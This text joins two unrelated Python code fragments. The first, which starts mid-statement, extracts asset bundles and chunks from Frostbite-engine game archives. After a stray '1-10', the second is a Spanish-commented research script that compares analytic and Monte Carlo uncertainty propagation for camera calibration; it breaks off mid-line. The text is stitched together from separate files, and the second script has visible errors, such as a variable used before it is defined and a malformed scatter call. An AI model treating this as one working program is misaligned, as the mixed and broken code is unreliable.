bundle.get("res",list()): #name sha1 size originalSize resRid resType resMeta res.addToResTable(entry.get("resRid"),entry.get("name"),entry.get("resType"),entry.get("resMeta")) path=os.path.join(resPath,entry.get("name")+res.getResExt(entry.get("resType"))) writePayload(entry,path,False) for entry in bundle.get("chunks",list()): #id sha1 size logicalOffset logicalSize chunkMeta::h32 chunkMeta::meta path=os.path.join(chunkPath,entry.get("id").format()+".chunk") writePayload(entry,path,True) #Deal with the chunks which are defined directly in the toc. #These chunks do NOT know their originalSize. for entry in toc.get("chunks"): #id sha1 targetPath=os.path.join(chunkPathToc,entry.get("id").format()+".chunk") payload.casChunkPayload(entry,targetPath) else: for tocEntry in toc.get("bundles"): #id offset size, size is redundant if tocEntry.get("base"): continue #Patched bundle. However, use the unpatched bundle because no file was patched at all. sb.seek(tocEntry.get("offset")) if tocEntry.get("delta"): #The sb currently points at the delta file. #Read the unpatched toc of the same name to get the base bundle. baseToc=dbo.readToc(baseTocPath) for baseTocEntry in baseToc.get("bundles"): if baseTocEntry.get("id").lower() == tocEntry.get("id").lower(): break else: #if no base bundle has with this name has been found: pass #use the last base bundle. This is okay because it is actually not used at all (the delta has uses instructionType 3 only). basePath=baseTocPath[:-3]+"sb" base=open(basePath,"rb") base.seek(baseTocEntry.get("offset")) bundle=noncas.patchedBundle(base, sb) #create a patched bundle using base and delta base.close() writePayload=payload.noncasPatchedBundlePayload sourcePath=[basePath,sbPath] #base, delta else: bundle=noncas.unpatchedBundle(sb) writePayload=payload.noncasBundlePayload sourcePath=sbPath for entry in bundle.ebx: path=os.path.join(ebxPath,entry.name+".ebx") if writePayload(entry,path,sourcePath): ebx.addEbxGuid(path,ebxPath) for entry in bundle.res: res.addToResTable(entry.resRid,entry.name,entry.resType,entry.resMeta) path=os.path.join(resPath,entry.name+res.getResExt(entry.resType)) writePayload(entry,path,sourcePath) for entry in bundle.chunks: path=os.path.join(chunkPath,entry.id.format()+".chunk") writePayload(entry,path,sourcePath) #Deal with the chunks which are defined directly in the toc. #These chunks do NOT know their originalSize. for entry in toc.get("chunks"): #id offset size targetPath=os.path.join(chunkPathToc,entry.get("id").format()+".chunk") payload.noncasChunkPayload(entry,targetPath,sbPath) sb.close() def dumpRoot(dataDir,patchDir,outPath): os.makedirs(outPath,exist_ok=True) for dir0, dirs, ff in os.walk(dataDir): for fname in ff: if fname[-4:]==".toc": fname=os.path.join(dir0,fname) localPath=os.path.relpath(fname,dataDir) print(localPath) #Check if there's a patched version and extract it first. patchedName=os.path.join(patchDir,localPath) if os.path.isfile(patchedName): dump(patchedName,fname,outPath) dump(fname,None,outPath) def findCats(dataDir,patchDir,readCat): #Read all cats in the specified directory. for dir0, dirs, ff in os.walk(dataDir): for fname in ff: if fname=="cas.cat": fname=os.path.join(dir0,fname) localPath=os.path.relpath(fname,dataDir) print("Reading %s..." % localPath) readCat(fname) #Check if there's a patched version. patchedName=os.path.join(patchDir,localPath) if os.path.isfile(patchedName): print("Reading patched %s..." % os.path.relpath(patchedName,patchDir)) readCat(patchedName) #make the paths absolute and normalize the slashes gameDirectory=os.path.normpath(gameDirectory) targetDirectory=os.path.normpath(targetDirectory) #it's an absolute path already payload.zstdInit() print("Loading RES names...") res.loadResNames() #Load layout.toc tocLayout=dbo.readToc(os.path.join(gameDirectory,"Data","layout.toc")) if not tocLayout.getSubObject("installManifest") or \ not tocLayout.getSubObject("installManifest").getSubObject("installChunks"): if not os.path.isfile(os.path.join(gameDirectory,"Data","das.dal")): #Old layout similar to Frostbite 2 with a single cas.cat. #Can also be non-cas. dataDir=os.path.join(gameDirectory,"Data") updateDir=os.path.join(gameDirectory,"Update") patchDir=os.path.join(updateDir,"Patch","Data") if not tocLayout.getSubObject("installManifest"): readCat=cas.readCat1 else: readCat=cas.readCat2 #Star Wars: Battlefront Beta catPath=os.path.join(dataDir,"cas.cat") #Seems to always be in the same place. if os.path.isfile(catPath): print("Reading cat entries...") readCat(catPath) #Check if there's a patched version. patchedCat=os.path.join(patchDir,os.path.relpath(catPath,dataDir)) if os.path.isfile(patchedCat): print("Reading patched cat entries...") readCat(patchedCat) if os.path.isdir(updateDir): #First, extract all DLCs. for dir in os.listdir(updateDir): if dir=="Patch": continue print("Extracting DLC %s..." % dir) dumpRoot(os.path.join(updateDir,dir,"Data"),patchDir,targetDirectory) #Now extract the base game. print("Extracting main game...") dumpRoot(dataDir,patchDir,targetDirectory) else: #Special case for Need for Speed: Edge. Same as early FB3 but uses das.dal instead of cas.cat. dataDir=os.path.join(gameDirectory,"Data") print("Reading dal entries...") dalPath=os.path.join(dataDir,"das.dal") das.readDal(dalPath) print("Extracting main game...") das.dumpRoot(dataDir,targetDirectory) print("Extracting FE...") das.dumpFE(dataDir,targetDirectory) else: #New version with multiple cats split into install groups, seen in 2015 and later games. #Appears to always use cas.cat and never use delta bundles, patch just replaces bundles fully. dataDir=os.path.join(gameDirectory,"Data") updateDir=os.path.join(gameDirectory,"Update") patchDir=os.path.join(gameDirectory,"Patch") #Detect cat version. if tocLayout.getSubObject("installManifest").get("maxTotalSize")!=None: readCat=cas.readCat3 else: readCat=cas.readCat4 if os.path.isdir(updateDir): #First, extract all DLCs. for dir in os.listdir(updateDir): print("Extracting DLC %s..." % dir) dir=os.path.join(updateDir,dir,"Data") findCats(dir,patchDir,readCat) dumpRoot(dir,patchDir,targetDirectory) #Now extract the base game. print("Extracting main game...") findCats(dataDir,patchDir,readCat) dumpRoot(dataDir,patchDir,targetDirectory) if not os.path.isdir(targetDirectory): print("Nothing was extracted, did you set input path correctly?") sys.exit(1) print("Writing EBX GUID table...") ebx.writeGuidTable(targetDirectory) print ("Writing RES table...") res.writeResTable(targetDirectory) payload.zstdCleanup() 1-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Jun 2 20:11:26 2017 test uncertanty propagation wrt montecarlo @author: sebalander """ # %% import numpy as np import glob from calibration import calibrator as cl import matplotlib.pyplot as plt from importlib import reload import scipy.linalg as ln from numpy import sqrt, cos, sin from dev.bayesLib import flat2int import dev.bayesLib as bl import scipy.stats as sts import scipy.special as spe import pickle from calibration.calibrator import datafull, real, realdete, realbalk, realches from calibration.calibrator import synt, syntextr, syntches, syntintr def calculaCovarianza(xM, yM): ''' lso inputs son de tamaño (Nsamples, Mpuntos) con Nsamples por cada uno de los Mpuntos puntos ''' muXm = np.mean(xM, axis=0) muYm = np.mean(yM, axis=0) xMcen = xM.T - muXm.reshape(-1, 1) yMcen = yM.T - muYm.reshape(-1, 1) CmNum = np.empty((xM.shape[1], 2, 2), dtype=float) CmNum[:, 0, 0] = np.sum(xMcen**2, axis=1) CmNum[:, 1, 1] = np.sum(yMcen**2, axis=1) CmNum[:, 0, 1] = CmNum[:, 1, 0] = np.sum(xMcen*yMcen, axis=1) CmNum /= (xM.shape[0] - 1) return [muXm, muYm], CmNum # %% from scipy.stats import multivariate_normal N = 10000 M = 23 C = np.array([[[2,1],[1,3]]] * M) if np.all(np.linalg.eigvals(C) > 0): T = cl.unit2CovTransf(C) # calculate transform matriz X = np.random.randn(N, M, 2) # gen rndn points unitary normal X = (X.reshape((N, M, 1, 2)) * # transform T.reshape((1, M, 2, 2)) ).sum(-1) else: print('Error: la covarianza no es definida positiva') #X2 = multivariate_normal.rvs(mean=None, cov=C, size=n).T [muX, muY], CNum = calculaCovarianza(X[:,:,0], X[:,:,1]) #[muX2, muY2], CNum2 = calculaCovarianza(X2[0].reshape((-1,1)), X2[1].reshape((-1,1))) #print(C) #print(CNum) # #plt.figure() #plt.plot(C.flat, CNum.flat, '.') # #plt.figure() #ax = plt.gca() #xx = X[:,:,0].reshape(-1) #yy = X[:,:,1].reshape(-1) #ax.scatter(xx, yy, s=1, alpha=0.03) #cl.plotPointsUncert(ax, [C[0]], [0], [0], col='k') # # ##CNum2 #print(np.allclose(C, CNum, rtol=0.05)) # %% funcion que hace todas las cuentas def analyticVsMC(imgPts, Ci, F, K, Cintr, rtV, Crt, nPt, N, retPts=True): ''' Parameters and shapes ------- imagePoints: coordinates in image (N,2) Ci: uncertainty of imegePoints (N,2,2) F: Camera Matrix (3,3) Cf: uncertainty on the 4 parameters of camera matrix (nF,nF), tipically nF=4. K: intrinsic parameters, a vector (nK,) Ck: uncertainty of intrinsic parameters (nK, nK) Cfk: covariance of cross intrinsic parameters (nF,nK) rtV: vector of 6 pose params (6,) Crt: covariance on pose (6,6) ''' Cf = np.zeros((4, 4)) # param de CCD, dist focal, centro Cf[2:, 2:] += Cintr[:Ns[0], :Ns[0]] Ck = Cintr[Ns[0]:, Ns[0]:] # k de distorsion Cfk = Cintr[:Ns[0], Ns[0]:] rV, tV = rtV.reshape((2, -1)) # propagate to homogemous xd, yd, Cd, _ = cl.ccd2dis(imgPts[:, 0], imgPts[:, 1], F, Cccd=Ci, Cf=Cf) # go to undistorted homogenous xh, yh, Ch = cl.dis2hom(xd, yd, K, model, Cd=Cd, Ck=Ck, Cfk=Cfk) # project to map xm, ym, Cm = cl.xyhToZplane(xh, yh, rV, tV, Ch=Ch, Crt=Crt) # generar puntos y parametros # por suerte todas las pdfs son indep Ti = cl.unit2CovTransf(Ci) xI = (np.random.randn(N, nPt, 1, 2) * Ti.reshape((1, -1, 2, 2))).sum(-1) + imgPts Trt = cl.unit2CovTransf(Crt) rtVsamples = (np.random.randn(N, 1, 6) * Trt.reshape((1, 6, 6)) ).sum(-1) + rtV rots = rtVsamples[:, :3] # np.random.randn(N, 3).dot(np.sqrt(Cr)) + rV tras = rtVsamples[:, 3:] # np.random.randn(N, 3).dot(np.sqrt(Ct)) + tV # # para chequear que esta bien multiplicado esto # ertest = (rtVsamples[0] - rtV).dot(Crt).dot((rtVsamples[0] - rtV).T) # np.isclose(ertest, np.sum(((rtVsamples[0] - rtV).dot(Dextr))**2)) # np.isclose(ertest, np.sum(((rtVsamples[0] - rtV).dot(Dextr.T))**2)) Tintr = cl.unit2CovTransf(Cintr) fkVsamples = (np.random.randn(N, 1, Ns[1]) * Tintr.reshape((1, Ns[1], Ns[1])) ).sum(-1) + fkV kL = fkVsamples[:, :Ns[0]] kD = fkVsamples[:, Ns[0]:] # kD = np.random.randn(N, Cf.shape[0]).dot(np.sqrt(Cf)) + K # distorsion # kL = np.zeros((N, 3, 3), dtype=float) # lineal # kL[:, 2, 2] = 1 # kL[:, :2, 2] = np.random.randn(N, 2).dot(np.sqrt(Ck[2:, 2:])) + F[:2, 2] # kL[:, [0, 1], [0, 1]] = np.random.randn(N, 2).dot(np.sqrt(Ck[:2, :2])) # kL[:, [0, 1], [0, 1]] += F[[0, 1], [0, 1]] # estos son los puntos sampleados por montecarlo, despues de xD, yD, xH, yH, xM, yM = np.empty((6, N, nPt), dtype=float) for i in range(N): # F, K = flat2int(fkVsamples[i], Ns, model) # % propagate to homogemous camMat = bl.flat2CamMatrix(kL[i], model) xD[i], yD[i], _, _ = cl.ccd2dis(xI[i, :, 0], xI[i, :, 1], camMat) # % go to undistorted homogenous xH[i], yH[i], _ = cl.dis2hom(xD[i], yD[i], kD[i], model) # % project to map xM[i], yM[i], _ = cl.xyhToZplane(xH[i], yH[i], rots[i], tras[i]) muI, CiNum = calculaCovarianza(xI[:, :, 0], xI[:, :, 1]) muD, CdNum = calculaCovarianza(xD, yD) muH, ChNum = calculaCovarianza(xH, yH) muM, CmNum = calculaCovarianza(xM, yM) ptsTeo = [[xd, yd], [xh, yh], [xm, ym]] ptsNum = [muI, muD, muH, muM] ptsMC = [xI, xD, yD, xH, yH, xM, yM] covTeo = [Ci, Cd, Ch, Cm] covNum = [CiNum, CdNum, ChNum, CmNum] if retPts: return ptsTeo, ptsNum, covTeo, covNum, ptsMC else: return covTeo, covNum # %% LOAD DATA np.random.seed(0) # input plotCorners = False #import collections as clt fullDataFile = "./resources/fullDataIntrExtr.npy" dataFile = open(fullDataFile, "rb") fullData = pickle.load(dataFile) dataFile.close() # cam puede ser ['vca', 'vcaWide', 'ptz'] son los datos que se tienen camera = fullData.Synt.Intr.camera #modelos = ['poly', 'rational', 'fisheye', 'stereographic'] model = fullData.Synt.Intr.model Ns = [2,3] nH = fullData.Synt.Extr.h.shape[0] nAng = fullData.Synt.Extr.ang.shape[0] fkV = np.concatenate([fullData.Synt.Intr.uv, [fullData.Synt.Intr.k]]) # # load model specific data cameraMatrix, distCoeffs = flat2int(fkV, Ns, model) # load data rVall = fullData.Synt.Extr.rVecs rVall = np.transpose([rVall] * nH, (1, 0, 2)).reshape((-1, 3)) tVall = fullData.Synt.Extr.tVecs.reshape((-1, 3)) rtVall = np.concatenate([rVall, tVall], axis=1) nPt = fullData.Synt.Extr.imgPt.shape[2] # cantidad de imagenes nIm = np.prod(fullData.Synt.Extr.imgPt.shape[:2]) # puntos por imagen # imagePoints = fullData.Synt.Extr.imgPt.reshape((nIm, nPt, 2)) chessboardModel = fullData.Synt.Ches.objPt imgSize = fullData.Synt.Intr.s # tomo las detecciones sin ruido imagePointsAll = fullData.Synt.Extr.imgPt.reshape((nIm, nPt, 2)) objpoints = np.array([chessboardModel]*nIm) # %%ELIJO UNA DE LAS IMAGENES imSel = 4 imgPts = imagePointsAll[imSel] rtV = rtVall[imSel] # covarianzas de 1% de desvest Cintr = np.diag((fkV / 1000)**2) Crt = np.diag((rtV / 1000)**2) Ci = (1.0**2) * np.array([np.eye(2)] * nPt) / 1 # 1pixel std N = 5000 # cantidad de realizaciones # %% #reload(cl) np.random.seed(0) retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt, nPt, N) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] = ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum # %% plot everything ptSelected = 7 # de lso 54 puntos este es el seleccionado para acercamiento fig = plt.figure() #from mpl_toolkits.axes_grid1.inset_locator import mark_inset #from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes figManager = plt.get_current_fig_manager() figManager.window.showMaximized() # plot initial uncertanties #figI = plt.figure(1) axI = plt.subplot(241) # figI.gca() cl.plotPointsUncert(axI, Ci, imgPts[:,0], imgPts[:,1], 'b') cl.plotPointsUncert(axI, CiNum, muI[0], muI[1], 'k') axI.plot(xI[:, :, 0].flat, xI[:, :, 1].flat, '.k', markersize=0.5) axI.axis('equal') axI.set_xlabel('xI') axI.set_ylabel('yI') # propagate to homogemous axD = plt.subplot(242) # figD.gca() cl.plotPointsUncert(axD, Cd, xd, yd, 'b') cl.plotPointsUncert(axD, CdNum, muD[0], muD[1], 'k') axD.plot(xD.flat, yD.flat, '.k', markersize=0.5) #axD.plot(xd[0], yd[0], 'xr', markersize=5) axD.axis('equal') axD.set_xlabel('xD') axD.set_ylabel('yD') # go to undistorted homogenous #figH = plt.figure(3) axH = plt.subplot(243) # figH.gca() cl.plotPointsUncert(axH, Ch, xh, yh, 'b') cl.plotPointsUncert(axH, ChNum, muH[0], muH[1], 'k') axH.plot(xH.flat, yH.flat, '.k', markersize=0.5) #axH.plot(xh[0], yh[0], 'xr', markersize=5) axH.axis('equal') axH.set_xlabel('xH') axH.set_ylabel('yH') for iPt in range(nPt): axH.text(xh[iPt], yh[iPt], iPt) # project to map #figM = plt.figure(4) axM = plt.subplot(244) # figM.gca() axM.plot(xm, ym, '+', markersize=2) cl.plotPointsUncert(axM, Cm, xm, ym, 'b') cl.plotPointsUncert(axM, CmNum, muM[0], muM[1], 'k') axM.plot(xM.flat, yM.flat, '.k', markersize=0.5) #axM.plot(xm[0], ym[0], 'xr', markersize=5) axM.axis('equal') axM.set_xlabel('xM') axM.set_ylabel('yM') for iPt in range(nPt): axM.text(xm[iPt], ym[iPt], iPt) # inset image axIins = plt.subplot(245) #axIins = zoomed_inset_axes(axI, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axI, axIins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axIins, [Ci[ptSelected]], [imgPts[ptSelected,0]], [imgPts[ptSelected,1]], 'b') cl.plotPointsUncert(axIins, [CiNum[ptSelected]], [muI[0][ptSelected]], [muI[1][ptSelected]], 'k') axIins.plot(xI[:, ptSelected, 0], xI[:, ptSelected, 1], '.k', markersize=0.5) axIins.axis('equal') #axIins.set_xticks([False]) #axIins.set_yticks([False]) #inset distorted axDins = plt.subplot(246) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axDins, [Cd[ptSelected]], [xd[ptSelected]], [yd[ptSelected]], 'b') cl.plotPointsUncert(axDins, [CdNum[ptSelected]], [muD[0][ptSelected]], [muD[1][ptSelected]], 'k') axDins.plot(xD[:, ptSelected], yD[:, ptSelected], '.k', markersize=0.5) axDins.axis('equal') #inset homogenous axHins = plt.subplot(247) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axHins, [Ch[ptSelected]], [xh[ptSelected]], [yh[ptSelected]], 'b') cl.plotPointsUncert(axHins, [ChNum[ptSelected]], [muH[0][ptSelected]], [muH[1][ptSelected]], 'k') axHins.plot(xH[:, ptSelected], yH[:, ptSelected], '.k', markersize=0.5) axHins.axis('equal') #inset world axMins = plt.subplot(248) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axMins, [Cm[ptSelected]], [xm[ptSelected]], [ym[ptSelected]], 'b') cl.plotPointsUncert(axMins, [CmNum[ptSelected]], [muM[0][ptSelected]], [muM[1][ptSelected]], 'k') axMins.plot(xM[:, ptSelected], yM[:, ptSelected], '.k', markersize=0.5) axMins.axis('equal') # dibujo los rectangulos import matplotlib.patches as patches boxFactor = 10.0 #boxFactor_inv = 1 / boxFactor # caja en imagen boxIxy = np.array([axIins.get_xlim()[0], axIins.get_ylim()[0]]) # get caja boxIwh = np.array([axIins.get_xlim()[1] - boxIxy[0], axIins.get_ylim()[1] - boxIxy[1]]) boxIxy += boxIwh / 2 # centro de la caja boxIwh *= boxFactor # agrando la caja boxIxy -= boxIwh / 2 # esquina axI.add_patch(patches.Rectangle(boxIxy, boxIwh[0], boxIwh[1], fill=False)) # caja en distorsionado boxDxy = np.array([axDins.get_xlim()[0], axDins.get_ylim()[0]]) # get caja boxDwh = np.array([axDins.get_xlim()[1] - boxDxy[0], axDins.get_ylim()[1] - boxDxy[1]]) boxDxy += boxDwh / 2 # centro de la caja boxDwh *= boxFactor # agrando la caja boxDxy -= boxDwh / 2 # esquina axD.add_patch(patches.Rectangle(boxDxy, boxDwh[0], boxDwh[1], fill=False)) # caja en homogeneas boxHxy = np.array([axHins.get_xlim()[0], axHins.get_ylim()[0]]) # get caja boxHwh = np.array([axHins.get_xlim()[1] - boxHxy[0], axHins.get_ylim()[1] - boxHxy[1]]) boxHxy += boxHwh / 2 # centro de la caja boxHwh *= boxFactor # agrando la caja boxHxy -= boxHwh / 2 # esquina axH.add_patch(patches.Rectangle(boxHxy, boxHwh[0], boxHwh[1], fill=False)) # caja en mapa boxMxy = np.array([axMins.get_xlim()[0], axMins.get_ylim()[0]]) # get caja boxMwh = np.array([axMins.get_xlim()[1] - boxMxy[0], axMins.get_ylim()[1] - boxMxy[1]]) boxMxy += boxMwh / 2 # centro de la caja boxMwh *= boxFactor # agrando la caja boxMxy -= boxMwh / 2 # esquina axM.add_patch( patches.Rectangle(boxMxy, boxMwh[0], boxMwh[1], fill=False)) plt.tight_layout() # %% corro para todas la imagenes N = 5000 # cantidad de realizaciones np.random.seed(0) Ci = (1.0**2) * np.array([np.eye(2)]*nPt) / 1 # 1pixel std #lik = np.zeros((nIm, nPt, N)) xTeo = np.zeros((nIm, 2, nPt)) xMC = np.zeros((nIm, 2, nPt)) Cteo = np.zeros((nIm, nPt, 2, 2)) Cmc = np.zeros((nIm, nPt, 2, 2)) for imSel in range(nIm): print(imSel) imgPts = imagePointsAll[imSel] rtV = rtVall[imSel] # covarianzas de 1% de desvest Cintr = np.diag((fkV / 1000)**2) Crt = np.diag((rtV / 1000)**2) retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt, nPt, N) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] = ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum xTeo[imSel] = [xm, ym] xMC[imSel] = muM Cteo[imSel] = Cm Cmc[imSel] = CmNum # # mahalanobis distance # xDif = np.array([xM - xm, yM - ym]).transpose((2,1,0)) # Sm = np.linalg.inv(Cm) # precision matrix # SmNum = np.linalg.inv(CmNum) ## mahDist = (xDif.reshape((nPt,N,2,1)) * ## Sm.reshape((nPt,1,2,2)) * ## xDif.reshape((nPt,N,1,2)) ## ).sum(axis=(2,3)) # # matrix determiants square root # Cm = Cm.T # detTeo = Cm[0, 0] * Cm[1, 1] - Cm[0, 1] * Cm[1, 0] # CmNum = CmNum.T # detMC = CmNum[0, 0] * CmNum[1, 1] - CmNum[0, 1] * CmNum[1, 0] # # # likelihood (no 2pi yet) ## lik[imSel] = np.exp(- mahDist / 2) / detsSqrt.reshape((-1,1)) # np.log() #lik /= 2 * np.pi # remaining normalising factor #likelihood = np.exp(np.sum(np.log(lik), axis=2)) difX = np.transpose(xMC - xTeo, (0,2,1)) Steo = np.linalg.inv(Cteo) # las inversas Smc = np.linalg.inv(Cmc) CteoT = np.transpose(Cteo, (2, 3, 0, 1)) CmcT = np.transpose(Cmc, (2, 3, 0, 1)) detTeo = CteoT[0, 0] * CteoT[1, 1] - CteoT[0, 1] * CteoT[1, 0] detMC = CmcT[0, 0] * CmcT[1, 1] - CmcT[0, 1] * CmcT[1, 0] # logaritmo de determinantes logDets = np.log(detTeo / detMC) # aprovechoq ue son simetricas traceC1C2 = np.sum(Steo * Cmc, axis=(2,3)) # mahalanobis mah = (difX.reshape((nIm,nPt,2,1)) * Smc * difX.reshape((nIm,nPt,1,2))).sum(axis=(2,3)) #mah2 = np.zeros_like(mah) #for i in range(nIm): # for j in range(nPt): # mah2[i,j] = difX[i,j].dot(Smc[i,j]).dot(difX[i,j]) #np.allclose(mah,mah2) ''' formula de la divergencia KL para dos gaussianas. fuente: https://stats.stackexchange.com/questions/60680/kl-divergence-between-two-multivariate-gaussians#60699 https://www.math.uwaterloo.ca/~hwolkowi//matrixcookbook.pdf ''' KL = (logDets - 2 + traceC1C2 + mah) / 2 KLmean = np.mean(KL) KLmedian = np.median(KL) plt.hist(KL.reshape(-1),30) plt.title('histograma de divergencias KL') plt.xlabel('divergencia KL') plt.text(0.0015, 150, 'media: %1.2e\nmoda: %1.2e'%(KLmean, KLmedian)) # %% pruebo de poner todo sobre una elipse normalizada a circulo # las elipses de montecarlo: TallMC = cl.unit2CovTransf(Cmc.reshape((-1,2,2))) ellMC = np.dot(TallMC, cl.Xcirc) + difX.reshape((-1,2,1)) # para llevar las elipses teoricas al circulo unitario: CteoUnit2Cov = np.linalg.inv(cl.unit2CovTransf(Cteo.reshape((-1,2,2)))) ellMCunitario = (CteoUnit2Cov.reshape((-1,2,2,1)) * ellMC.reshape((-1,1,2,cl.Xcirc.shape[1])) ).sum(axis=2) # %% plt.figure() for ell in ellMCunitario: plt.plot(ell[0], ell[1], '-b', alpha=0.1, lw=1.0) plt.plot(cl.Xcirc[0], cl.Xcirc[1], '-r') plt.axis('equal') plt.xlabel('transformed Xm') plt.ylabel('transformed Ym') plt.savefig("/home/sebalander/Dropbox/Vision/2018internationalPaper/" + "figs/ellipsesNormalised.png") # %% # %% # calculo las normas de frobenius de cada matriz y de la diferencia CiF, CdF, ChF, CmF = [ln.norm(C, axis=(1,2)) for C in [Ci, Cd, Ch, Cm]] CiNF, CdNF, ChNF, CmNF = [ln.norm(C, axis=(1,2)) for C in [CiNum, CdNum, ChNum, CmNum]] CiDF, CdDF, ChDF, CmDF = [ln.norm(C, axis=(1,2)) for C in [Ci - CiNum, Cd - CdNum, Ch - ChNum, Cm - CmNum]] li, ld, lh, lm = np.empty((4,npts,3), dtype=float) liN, ldN, lhN, lmN = np.empty((4,npts,3), dtype=float) # %% def sacoValsAng(C): npts = C.shape[0] L = np.empty((npts, 3), dtype=float) # calculo valores singulares y angulo for i in range(npts): l, v = ln.eig(C[i]) L[i] = [np.sqrt(l[0].real), np.sqrt(l[1].real), np.arctan(v[0, 1] / v[0, 0])] return L Li, Ld, Lh, Lm = [sacoValsAng(C) for C in [Ci, Cd, Ch, Cm]] LiN, LdN, LhN, LmN = [sacoValsAng(C) for C in [CiNum, CdNum, ChNum, CmNum]] # %% "indicadores" de covarianza # radio desde centro optico rads = ln.norm(imgPts - cameraMatrix[:2, 2], axis=1) tVm = cl.rotateRodrigues(rtV[3:],-rtV[:3]) # traslation vector in maps frame of ref factorVista = ln.norm(chessboardModel[0].T + tVm.reshape(-1,1), axis=0) / tVm[2] # %% grafico las normas de las covarianzas # radios respecto al centro de distorsion ''' ver que la diferencia entre las covarianzas depende del radio y esta diferencia puede atribuirse a la nolinealidad de distorsion porque tiene una curva parecida 1- meter los 54 ptos de todas las imagenes a ver si siguen la misma tendencia 2- analizar por separado la covarianza numerica y la teorica y la diferencia es muy loco que la dependencia en el radio parece volver a difuminarse al hacer el ultimo paso del mapeo. ''' plt.figure() plt.subplot(221) plt.scatter(rads, CiF) plt.scatter(rads, CiNF) plt.subplot(222) plt.scatter(rads, CdF) plt.scatter(rads, CdNF) plt.subplot(223) plt.scatter(rads, ChF) plt.scatter(rads, ChNF) plt.subplot(224) plt.scatter(rads, CmF) plt.scatter(rads, CmNF) # %% rads = factorVista plt.figure() var = 0 plt.subplot(341) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(342) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(343) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(344) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) var = 1 plt.subplot(345) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(346) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(347) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(348) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) var = 2 plt.subplot(349) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(3,4,10) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(3,4,11) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(3,4,12) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) # %% plt.figure() var = 0 plt.subplot(341) plt.scatter(Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], [np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(342) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(343) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(344) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') var = 1 plt.subplot(345) plt.scatter(Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], [np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(346) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(347) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(348) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') var = 2 plt.subplot(349) plt.scatter(rads, Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], [np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(3,4,10) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(3,4,11) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(3,4,12) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') # %% saco de todos los puntos las desvests y angulo L = list() LN = list() Rads = list() N = 5000 # cantidad de puntos MC Ci = (1.0**2) * 